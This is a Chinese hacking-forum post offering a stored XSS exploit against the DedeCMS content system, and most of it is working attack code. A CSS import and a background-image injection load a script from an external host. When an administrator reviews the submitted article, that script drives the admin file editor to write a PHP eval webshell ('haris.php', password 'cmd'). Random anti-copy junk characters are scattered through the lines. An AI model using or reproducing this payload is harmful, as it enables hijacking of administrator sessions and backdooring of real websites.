找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1644|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell: X! l3 @0 U4 A: m3 I6 O
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
* L! w4 `% v; _$ s6 [目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
" k0 [2 m/ c$ T3 ~) V8 t  t% J下面说说利用方法。) o2 y$ c9 z) D% l1 K. A
条件有2个:
9 O: F3 p& l; F. @* @, {1.开启注册
* j! E0 S4 }  ^2 o4 X2.开启投稿6 T! l' E$ [& N: W5 _/ k: y$ [' O$ `4 [
注册会员----发表文章. ]& Y$ C' o! }& u, x1 w& i+ ^
内容填写:
' U; I2 m/ e: V# w  F. }. o0 G复制代码! \' g3 o0 D6 s3 [6 s
<style>@im\port'\http://xxx.com/xss.css';</style>
( A5 j+ O2 h; R; d" w# M新建XSS.Css" ^- R6 T9 ^$ C' f- L
复制代码
4 X7 M4 k4 [9 b; T5 M5 [.body{
8 k  F) Q3 a/ f' m( C7 bbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }& i( B$ {7 R: ?. ^- b( y
新建xss.js 内容为8 \( g; M  r( Z, l1 z
复制代码: b- j9 q1 N% Z
1.var request = false;6 |. U* {9 z0 S$ l
2.if(window.XMLHttpRequest) {
$ J( [8 z8 t, @) @/ `, r. V$ y  h3.request = new XMLHttpRequest();% _$ S9 ]+ M$ ]5 R% y. ?
4.if(request.overrideMimeType) {4 b: Q' b) W' L4 F# e% z
5.request.overrideMimeType('text/xml');
, g' i9 |+ Y! \2 n% M! w6.}# X. ]5 `, j' h6 t+ E& V- o
7.} else if(window.ActiveXObject) {
% d% f! l4 d4 C0 J8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
1 K$ ?3 `) k3 Y0 T: F3 H# d9.for(var i=0; i<versions.length; i++) {% Y  I- P7 W6 m4 y7 H2 ]8 H& J
10.try {, m. p! X2 h; b/ h: U
11.request = new ActiveXObject(versions);  A4 o: `; s5 q
12.} catch(e) {}/ z1 P! j: C. A! y# j- g6 F
13.}3 n5 D. H& ]9 U  N8 r) {
14.}
& z, ^9 [6 a) |7 ]: p15.xmlhttp=request;
% c  t- u  R" U$ V. B16.function getFolder( url ){8 e. \! V7 X; N- L) R. V
17. obj = url.split('/'): `4 y* e: Q7 O. A1 {
18. return obj[obj.length-2]
( X. b! Q- L4 n" \, N6 b19.}
" K+ M% _$ F3 H# N4 `20.oUrl = top.location.href;
0 ~  `% C( v5 ^' O21.u = getFolder(oUrl);
- t) @- L1 j3 S" J8 S+ P22.add_admin();
* h) _' B( u1 f23.function add_admin(){
) D" F' ~& C+ m, H4 d# j& ]0 ]24.var url= "/"+u+"/sys_sql_query.php";& h( X( {5 z( T6 P7 T3 w$ G
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
6 E% P! U+ H/ g6 L26.xmlhttp.open("POST", url, true);
# u* V0 F" I3 s% `7 Z27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");/ U9 Y- E8 Q  N% b3 i' ?+ i0 P# j0 @
28.xmlhttp.setRequestHeader("Content-length", params.length);
1 p" s6 v& P( r7 K29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");4 h8 z/ v' {- J* u$ j- f% w
30.xmlhttp.send(params);
6 v$ ?) h6 D8 }6 t+ e" p# ^31.}9 h' [6 F7 n- ]2 X3 o# K
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表